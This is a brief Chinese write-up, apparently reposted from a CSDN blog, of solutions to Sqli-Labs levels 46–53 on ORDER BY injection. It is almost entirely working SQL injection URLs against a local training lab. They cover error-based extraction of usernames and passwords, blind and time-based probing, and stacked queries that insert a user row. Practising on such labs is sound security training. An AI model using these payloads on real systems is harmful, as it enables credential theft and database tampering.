Sqli-Labs做题笔记:Less-46 - Less-53
作者:互联网
ORDER BY 注入
Less-46:
localhost/sqlilabs/Less-46/?sort=1 and (updatexml(1,concat(0x5e24,(substr((select+group_concat(username,0x7e,password)+from+security.users),1)),0x7e),1))
http://localhost/sqlilabs/Less-46/?sort=rand(ascii(mid((select%20group_concat(username)%20from%20users),1,1))=68)
Less-47:
localhost/sqlilabs/Less-47/?sort=1' and (updatexml(1,concat(0x5e24,(substr((select+group_concat(username,0x7e,password)+from+security.users),1)),0x7e),1))
Less-48:
http://localhost/sqlilabs/Less-48/?sort=rand(ascii(mid((select%20group_concat(username)%20from%20users),1,1))=68)
Less-49:
http://localhost/sqlilabs/Less-49/?sort=1%27%20and%20if(ascii(mid(database(),1,1))=115,sleep(0.1),0)--+
Less-50:
http://localhost/sqlilabs/Less-50/?sort=1;insert into users(id,username,password) values(69,'Joker','Joker')--+
Less-51:
http://localhost/sqlilabs/Less-51/?sort=1%27;insert into users(id,username,password) values(69,'Joker','Joker')--+
Less-52:
http://localhost/sqlilabs/Less-52/?sort=1;insert into users(id,username,password) values(69,'Joker','Joker')--+
Less-53:
http://localhost/sqlilabs/Less-53/?sort=1%27;insert into users(id,username,password) values(69,'Joker','Joker')--+
标签:sort,username,sqlilabs,Less,46,Joker,做题,localhost 来源: https://blog.csdn.net/Forever_Han13/article/details/122698590